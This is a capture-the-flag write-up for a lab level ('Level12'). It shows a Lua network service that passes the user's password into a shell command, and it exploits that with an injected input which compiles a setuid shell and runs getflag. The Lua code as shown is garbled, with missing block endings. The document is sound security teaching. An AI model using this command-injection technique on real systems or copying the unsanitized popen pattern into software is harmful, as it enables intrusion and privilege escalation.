In Level12 we are given the following code:

local socket = require("socket")
local server = assert(socket.bind("", 50001))

function hash(password)
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")

  data = string.sub(data, 1, 40)

  return data

while 1 do
  local client = server:accept()
  client:send("Password: ")
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
      client:send("Congrats, your token is 413**CARRIER LOST**\n")



We have a command injection as the password variable can be controlled by the user and it is used to create a command that will be run in the system. All we need to do is inject our commands. In this case, we will be using the shell wrapper shown in level 11:

[email protected]:~$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; chmod +s /tmp/shell; echo 1
Better luck next time
[email protected]:~$ ls -la /tmp
total 32
drwxrwxrwt  4 root    root    4096 Nov 24 12:37 .
drwxr-xr-x 22 root    root    4096 Dec  6  2011 ..
-rwsr-sr-x  1 flag12  flag12  7241 Nov 24 12:43 shell
-rw-rw-r--  1 level11 level11  180 Nov 24 11:48 shell.c

Now lets run our shell and get the flag:

[email protected]:~$ cd /tmp
[email protected]:/tmp$ ./shell
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account

Voila !!